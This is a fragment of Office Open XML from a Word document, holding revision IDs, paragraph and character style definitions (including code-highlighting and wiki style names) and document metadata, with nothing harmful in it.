    <w:rsid w:val="00E853BA"/>
    <w:rsid w:val="00E908C2"/>
    <w:rsid w:val="00E90A75"/>
    <w:rsid w:val="00E917F4"/>
    <w:rsid w:val="00EA3168"/>
    <w:rsid w:val="00EA4D3F"/>
    <w:rsid w:val="00EB182E"/>
    <w:rsid w:val="00EB26D5"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00EC5DF3"/>
    <w:rsid w:val="00EC7974"/>
    <w:rsid w:val="00ED34D4"/>
    <w:rsid w:val="00ED4A4A"/>
    <w:rsid w:val="00ED5472"/>
    <w:rsid w:val="00EE2E85"/>
    <w:rsid w:val="00EE3C72"/>
    <w:rsid w:val="00EF125B"/>
    <w:rsid w:val="00EF145F"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00EF747D"/>
    <w:rsid w:val="00F00A34"/>
    <w:rsid w:val="00F01100"/>
    <w:rsid w:val="00F01647"/>
    <w:rsid w:val="00F033BD"/>
    <w:rsid w:val="00F035E7"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F10F68"/>
    <w:rsid w:val="00F16050"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F216B8"/>
    <w:rsid w:val="00F343D2"/>
    <w:rsid w:val="00F35FE3"/>
    <w:rsid w:val="00F360BA"/>
    <w:rsid w:val="00F40350"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F6150C"/>
    <w:rsid w:val="00F62622"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F758D8"/>
    <w:rsid w:val="00F81EAF"/>
    <w:rsid w:val="00F8357D"/>
    <w:rsid w:val="00F84C9B"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00F92B30"/>
    <w:rsid w:val="00F95474"/>
    <w:rsid w:val="00F9595B"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FA57CE"/>
    <w:rsid w:val="00FB154D"/>
    <w:rsid w:val="00FB1E44"/>
    <w:rsid w:val="00FB20EF"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FC2E7C"/>
    <w:rsid w:val="00FC373C"/>
    <w:rsid w:val="00FC4632"/>
    <w:rsid w:val="00FC515E"/>
    <w:rsid w:val="00FD037F"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FE1366"/>
    <w:rsid w:val="00FE2979"/>
    <w:rsid w:val="00FE5A79"/>
    <w:rsid w:val="00FE7FAB"/>
    <w:rsid w:val="00FF0ECB"/>
    <w:rsid w:val="00FF137D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E47F75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paragraph" w:customStyle="1" w:styleId="afff1">
    <w:name w:val="Повелитель"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00085FB4"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="567"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:bCs w:val="0"/>
      <w:caps w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00F758D8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection">
    <w:name w:val="mw-editsection"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00A75E0C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection-bracket">
    <w:name w:val="mw-editsection-bracket"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00A75E0C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection-divider">
    <w:name w:val="mw-editsection-divider"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00A75E0C"/>
  </w:style>
  <w:style w:type="character" w:styleId="afff2">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="006C1EE0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nf">
    <w:name w:val="nf"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mh">
    <w:name w:val="mh"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c1">
    <w:name w:val="c1"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-function">
    <w:name w:val="hljs-function"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00B14963"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00B14963"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00B1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19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Win32_Thread_Information_Bloc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9693A-A9FE-4900-AD6D-D84FAE28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2620</Words>
  <Characters>14940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2022-09-09T21:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>